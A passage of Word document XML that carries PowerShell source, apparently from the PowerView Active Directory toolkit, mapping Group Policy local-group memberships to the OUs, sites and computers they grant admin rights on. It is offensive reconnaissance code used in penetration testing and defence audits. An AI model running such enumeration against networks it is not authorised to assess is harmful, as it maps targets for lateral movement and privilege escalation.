    <w:p w14:paraId="1450F3F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'PageSize' = $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB31E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A54999" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A0549A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # enumerate all GPO group mappings for the target domain that involve our target SID set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E74D28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $GPOgroups = Get-NetGPOGroup @GPOGroupArgs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87C7EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="370DCB7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOgroup = $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743F53E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="752410E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if the locally set group is what we're looking for, check the GroupMembers ('members')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A975C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        #    for our target SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17179FD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($GPOgroup.GroupSID -match $TargetLocalSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005AF6F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFF8C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7CEDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458739EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5B31A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74D845" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399913B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256546D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395ABD95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6927C80E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632B381" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D1D5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBD618" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    } | Sort-Object -Property GPOName -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75512CBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="462E1637" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $GPOgroups | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711727CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="205ECBED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOname = $_.GPODisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1FEAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOguid = $_.GPOName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053A91C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOPath = $_.GPOPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B59A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOType = $_.GPOType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA7A1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($_.GroupMembers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742B7FBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOMembers = $_.GroupMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CFF091" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CB708" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691664E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOMembers = $_.GroupSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29D833" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57CDAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A6C0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Filters = $_.Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FC80D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73FA5D55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $TargetObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB7213" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if the * wildcard was used, set the ObjectDistName as the GPO member SID set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB427D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            #   so all relationship mappings are output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1968E38F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetObjectSIDs = $GPOMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE9BDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE9952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACBA6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetObjectSIDs = $TargetObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A78C70F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26794DA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16A5239D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # find any OUs that have this GUID applied and then retrieve any computers from the OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585401FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetOU -Domain $Domain -DomainController $DomainController -GUID $GPOguid -FullData -PageSize $PageSize | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD63D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Filters) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4AE3AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # filter for computer name/org unit if a filter is specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D37C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                #   TODO: handle other filters (i.e. OU filters?) again, I hate you GPP...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2144D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -FullData -PageSize $PageSize | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A3EB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_.adspath -match ($Filters.Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324302C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                } | ForEach-Object { $_.dnshostname }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58C4FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E897F1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE62A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7ADEA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBCABE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A1B5A5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($OUComputers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56668A62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7C152" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E2039F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                ForEach ($TargetSid in $TargetObjectSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C5DAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43825804" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A7764B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515EF94C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="438EC388" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F019F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'ObjectName' $Object.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420DF3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20FE15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'ObjectSID' $Object.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C013B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'Domain' $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC13424" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'IsGroup' $IsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA08B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'GPODisplayName' $GPOname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C504E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'GPOGuid' $GPOGuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B11B0A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'GPOPath' $GPOPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B2DB4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'GPOType' $GPOType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1893CA5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'ContainerName' $_.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6AD24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation | Add-Member Noteproperty 'ComputerName' $OUComputers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED4519" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation.PSObject.TypeNames.Add('PowerView.GPOLocalGroup')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180B636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOLocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DAFF47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497FE91C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1EB85B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74935C16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5440C0CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # find any sites that have this GUID applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331B91D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetSite -Domain $Domain -DomainController $DomainController -GUID $GPOguid -PageSize $PageSize -FullData | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597674D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C62BFAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($TargetSid in $TargetObjectSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43602D5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8F045" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60E67CB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054AE5FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25656078" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D329B5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'ObjectName' $Object.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597EE200" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B10213" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'ObjectSID' $Object.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A97834" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'IsGroup' $IsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487552E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'Domain' $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FA7D53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'GPODisplayName' $GPOname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA6BA56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'GPOGuid' $GPOGuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A473F45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'GPOPath' $GPOPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A532597" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'GPOType' $GPOType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D5DE83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'ContainerName' $_.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5F418" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023238E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite.PSObject.TypeNames.Add('PowerView.GPOLocalGroup')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBCD964" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $AppliedSite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ECC05F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739CF4B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676437FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4D156" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F7D5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7098A681" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B38A7A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-GPOComputerAdmin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3783ECF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B265D8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFCF4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A209816" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Takes a computer (or GPO) object and determines what users/groups are in the specified</w:t>
      </w:r>
    </w:p>
